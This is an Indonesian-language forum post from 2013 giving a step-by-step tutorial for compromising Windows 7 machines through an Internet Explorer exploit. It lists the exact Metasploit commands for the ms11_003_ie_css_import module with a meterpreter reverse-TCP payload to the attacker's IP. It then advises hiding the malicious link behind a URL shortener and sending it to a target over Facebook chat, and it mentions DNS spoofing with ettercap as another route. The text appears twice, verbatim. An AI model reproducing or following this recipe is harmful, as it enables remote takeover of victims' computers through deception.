04-26-2013, 02:50 PM
ini sih sebenernya akal akalan nya si bleki orion , tapi ilmu emang buat dishare kok :d
langsung aja tutorial nya , maap berantakan
exploit ini memanfaatkan kelemahan browser IE om , windows 7 bisa lah , tergantung kitanya sang attacker =))
pertama jelas buka termanal dong
1. buka msfconsole ,, terserah sih mau pake armitage ato msfgui , lanjut masukkan command command nya bro.
msf > use exploit/windows/browser/ms11_003_ie_css_import
2. lalu set payload nya , disini ane pake meterpreter/reverse_tcp
msf exploit(ms11_003_ie_css_import) > set payload windows/meterpreter/reverse_tcp
3. set ip LHOST nya , LHOST disini adalah ip ATTACKER dilanjutkan set URIPATH nya
msf exploit(ms11_003_ie_css_import) > set LHOST 192.168.151.14
msf exploit(ms11_003_ie_css_import) > set URIPATH /
4. nah , yang ini terserah , untuk SRVPORT nya bisa make port yang belum kepakai , misal ane pakai port 8080 yang nanti akan ane convert link nya supaya gak ketahuan , kan aneh kalo ngasih link ada port 8080 nya.
Sebenernya bisa lebih mudah pakai port 80 , jadi kita tinggal arah kan TARGET ke ip kita makek ettercap dengan plugins dns_spoof. Tapi berhubung pas bikin nih tutor ane lagi chatting dipesbuk ya maka kepakailah port 80 tersebut.
Paham bro ? kalo nggak paham ya berarti sama , ane juga gak paham =))
msf exploit(ms11_003_ie_css_import) > set SRVPORT 8080
5. Lanjut kita exploit
6. nah , http://192.168.151.14:8080
intinya bagaimana pun cara nya kita harus bisa mancing target buat buka tuh ip dengan port 8080 dll dengan browser internet explorer.
7. Disini ane pake teknik soceng sedikit , kita convert tuh link pake pendek.in
8. Oke , setelah dipendekin , link nya berubah , jadi gak mencurigakan , selanjut nya kasih ke target bisa melalui apa kek , chat pesbuk misal nya , pikir sendiri yah.
9. saat target membuka link tersebut dengan browser IE akan terlihat seperti SS berikut.
10. Nah...seperti Ss diatas , terlihat kata "meterpreter session 1 opened"
coba di enter trus kita interaksi dengan meterpreter id 1
nah , masuk sesi meterpreter , mari kita lihat info O.S nya
ckck windows 7 pwned :-?
ok, sekian tutorial dari saya , saya larcenciels ganteng mohon undur diri , sekian dan terimagaji =))
langsung aja tutorial nya , maap berantakan
exploit ini memanfaatkan kelemahan browser IE om , windows 7 bisa lah , tergantung kitanya sang attacker =))
pertama jelas buka termanal dong
1. buka msfconsole ,, terserah sih mau pake armitage ato msfgui , lanjut masukkan command command nya bro.
msf > use exploit/windows/browser/ms11_003_ie_css_import
2. lalu set payload nya , disini ane pake meterpreter/reverse_tcp
msf exploit(ms11_003_ie_css_import) > set payload windows/meterpreter/reverse_tcp
3. set ip LHOST nya , LHOST disini adalah ip ATTACKER dilanjutkan set URIPATH nya
msf exploit(ms11_003_ie_css_import) > set LHOST 192.168.151.14
msf exploit(ms11_003_ie_css_import) > set URIPATH /
4. nah , yang ini terserah , untuk SRVPORT nya bisa make port yang belum kepakai , misal ane pakai port 8080 yang nanti akan ane convert link nya supaya gak ketahuan , kan aneh kalo ngasih link ada port 8080 nya.
Sebenernya bisa lebih mudah pakai port 80 , jadi kita tinggal arah kan TARGET ke ip kita makek ettercap dengan plugins dns_spoof. Tapi berhubung pas bikin nih tutor ane lagi chatting dipesbuk ya maka kepakailah port 80 tersebut.
Paham bro ? kalo nggak paham ya berarti sama , ane juga gak paham =))
msf exploit(ms11_003_ie_css_import) > set SRVPORT 8080
5. Lanjut kita exploit
6. nah , http://192.168.151.14:8080
intinya bagaimana pun cara nya kita harus bisa mancing target buat buka tuh ip dengan port 8080 dll dengan browser internet explorer.
7. Disini ane pake teknik soceng sedikit , kita convert tuh link pake pendek.in
8. Oke , setelah dipendekin , link nya berubah , jadi gak mencurigakan , selanjut nya kasih ke target bisa melalui apa kek , chat pesbuk misal nya , pikir sendiri yah.
9. saat target membuka link tersebut dengan browser IE akan terlihat seperti SS berikut.
10. Nah...seperti Ss diatas , terlihat kata "meterpreter session 1 opened"
coba di enter trus kita interaksi dengan meterpreter id 1
nah , masuk sesi meterpreter , mari kita lihat info O.S nya
ckck windows 7 pwned :-?
ok, sekian tutorial dari saya , saya larcenciels ganteng mohon undur diri , sekian dan terimagaji =))